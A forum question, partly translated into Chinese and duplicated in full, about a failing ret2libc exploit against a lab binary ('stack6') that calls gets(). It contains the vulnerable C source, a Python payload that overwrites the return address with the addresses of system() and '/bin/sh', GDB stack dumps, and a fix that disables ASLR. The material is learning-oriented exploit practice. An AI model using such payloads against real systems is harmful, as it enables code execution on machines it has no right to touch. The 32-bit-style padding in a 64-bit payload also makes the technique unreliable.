分段错误 ret2libc 攻击
Segmentation Fault ret2libc attack
我正在尝试执行 ret2libc 攻击。
为此,我需要从 libc 调用 System() 并传递参数“/bin/sh”(/bin/sh 的地址)。不幸的是我每次都得到 "Segmentation Fault".
谁能告诉我为什么?如果我查看堆栈,一切看起来都很好(对我来说)。
这是我的源代码:
void getpath()
{
char buffer[64];
unsigned int ret;
printf("input path please: "); fflush(stdout);
gets(buffer);
ret = __builtin_return_address(0);
if((ret & 0xbf000000) == 0xbf000000) {
printf("bzzzt (%p)\n", ret);
_exit(1);
}
printf("got path %s\n", buffer);
}
int main(int argc, char **argv)
{
getpath();
}
我的漏洞利用代码如下:
import struct
offset = "A"*88
system_adress = struct.pack("q",0x7ffff7a60510)
nop = "\x90"*4
bin_sh_adress = struct.pack("q",0x7ffff7b9b3f3)
#libc_start = 0x7ffff7a1e000
#sh_offset = 0x17d3f3
#libc_start plus sh_Offset = 0x7ffff7b9b3f3
print(offset + system_adress + nop + bin_sh_adress)
In the following my terminal commands:
>>> r < ./text
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/ExerciseExploit/stack6 < ./text
Breakpoint 2, getpath () at stack6.c:11
11 printf("input path please: "); fflush(stdout);
>>> i r rsp rbp
rsp 0x7fffffffe160 0x7fffffffe160
rbp 0x7fffffffe1b0 0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x00000000 0x00000000 0x00f0b2ff 0x00000000
0x7fffffffe170: 0x000000c2 0x00000000 0xffffe1a6 0x00007fff
0x7fffffffe180: 0x00000001 0x00000000 0xf7abe905 0x00007fff
0x7fffffffe190: 0x00000001 0x00000000 0x5555485d 0x00005555
0x7fffffffe1a0: 0xf7de70e0 0x00007fff 0x00000000 0x00000000
0x7fffffffe1b0: 0xffffe1d0 0x00007fff 0x555547fd 0x00005555
0x7fffffffe1c0: 0xffffe2b8 0x00007fff 0x00000000 0x00000001
0x7fffffffe1d0: 0x55554810 0x00005555 0xf7a3fa87 0x00007fff
0x7fffffffe1e0: 0x00000000 0x00000000 0xffffe2b8 0x00007fff
0x7fffffffe1f0: 0x00040000 0x00000001 0x555547e4 0x00005555
>>> n
input path please: 13 gets(buffer);
>>> n
Breakpoint 1, getpath () at stack6.c:15
15 ret = __builtin_return_address(0);
>>> i r rsp rbp
rsp 0x7fffffffe160 0x7fffffffe160
rbp 0x7fffffffe1b0 0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe170: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe180: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe190: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1a0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1b0: 0x41414141 0x41414141 0xf7a60510 0x00007fff
0x7fffffffe1c0: 0x90909090 0xf7b9b3f3 0x00007fff 0x00000000
0x7fffffffe1d0: 0x55554810 0x00005555 0xf7a3fa87 0x00007fff
0x7fffffffe1e0: 0x00000000 0x00000000 0xffffe2b8 0x00007fff
0x7fffffffe1f0: 0x00040000 0x00000001 0x555547e4 0x00005555
>>> n
17 if((ret & 0xbf000000) == 0xbf000000) {
>>> n
22 printf("got path %s\n", buffer);
>>>
错误报告:
root@kali:~/Desktop/ExerciseExploit# python exploit6.py | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAA���
Segmentation fault
[关闭]
问题修复:
没有禁用 ASLR
-> 禁用 ASLR:echo 0 > /proc/sys/kernel/randomize_va_space
我正在尝试执行 ret2libc 攻击。 为此,我需要从 libc 调用 System() 并传递参数“/bin/sh”(/bin/sh 的地址)。不幸的是我每次都得到 "Segmentation Fault".
谁能告诉我为什么?如果我查看堆栈,一切看起来都很好(对我来说)。
这是我的源代码:
void getpath()
{
char buffer[64];
unsigned int ret;
printf("input path please: "); fflush(stdout);
gets(buffer);
ret = __builtin_return_address(0);
if((ret & 0xbf000000) == 0xbf000000) {
printf("bzzzt (%p)\n", ret);
_exit(1);
}
printf("got path %s\n", buffer);
}
int main(int argc, char **argv)
{
getpath();
}
我的漏洞利用代码如下:
import struct
offset = "A"*88
system_adress = struct.pack("q",0x7ffff7a60510)
nop = "\x90"*4
bin_sh_adress = struct.pack("q",0x7ffff7b9b3f3)
#libc_start = 0x7ffff7a1e000
#sh_offset = 0x17d3f3
#libc_start plus sh_Offset = 0x7ffff7b9b3f3
print(offset + system_adress + nop + bin_sh_adress)
In the following my terminal commands:
>>> r < ./text
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/ExerciseExploit/stack6 < ./text
Breakpoint 2, getpath () at stack6.c:11
11 printf("input path please: "); fflush(stdout);
>>> i r rsp rbp
rsp 0x7fffffffe160 0x7fffffffe160
rbp 0x7fffffffe1b0 0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x00000000 0x00000000 0x00f0b2ff 0x00000000
0x7fffffffe170: 0x000000c2 0x00000000 0xffffe1a6 0x00007fff
0x7fffffffe180: 0x00000001 0x00000000 0xf7abe905 0x00007fff
0x7fffffffe190: 0x00000001 0x00000000 0x5555485d 0x00005555
0x7fffffffe1a0: 0xf7de70e0 0x00007fff 0x00000000 0x00000000
0x7fffffffe1b0: 0xffffe1d0 0x00007fff 0x555547fd 0x00005555
0x7fffffffe1c0: 0xffffe2b8 0x00007fff 0x00000000 0x00000001
0x7fffffffe1d0: 0x55554810 0x00005555 0xf7a3fa87 0x00007fff
0x7fffffffe1e0: 0x00000000 0x00000000 0xffffe2b8 0x00007fff
0x7fffffffe1f0: 0x00040000 0x00000001 0x555547e4 0x00005555
>>> n
input path please: 13 gets(buffer);
>>> n
Breakpoint 1, getpath () at stack6.c:15
15 ret = __builtin_return_address(0);
>>> i r rsp rbp
rsp 0x7fffffffe160 0x7fffffffe160
rbp 0x7fffffffe1b0 0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe170: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe180: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe190: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1a0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1b0: 0x41414141 0x41414141 0xf7a60510 0x00007fff
0x7fffffffe1c0: 0x90909090 0xf7b9b3f3 0x00007fff 0x00000000
0x7fffffffe1d0: 0x55554810 0x00005555 0xf7a3fa87 0x00007fff
0x7fffffffe1e0: 0x00000000 0x00000000 0xffffe2b8 0x00007fff
0x7fffffffe1f0: 0x00040000 0x00000001 0x555547e4 0x00005555
>>> n
17 if((ret & 0xbf000000) == 0xbf000000) {
>>> n
22 printf("got path %s\n", buffer);
>>>
错误报告:
root@kali:~/Desktop/ExerciseExploit# python exploit6.py | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAA���
Segmentation fault
[关闭]
问题修复:
没有禁用 ASLR -> 禁用 ASLR:echo 0 > /proc/sys/kernel/randomize_va_space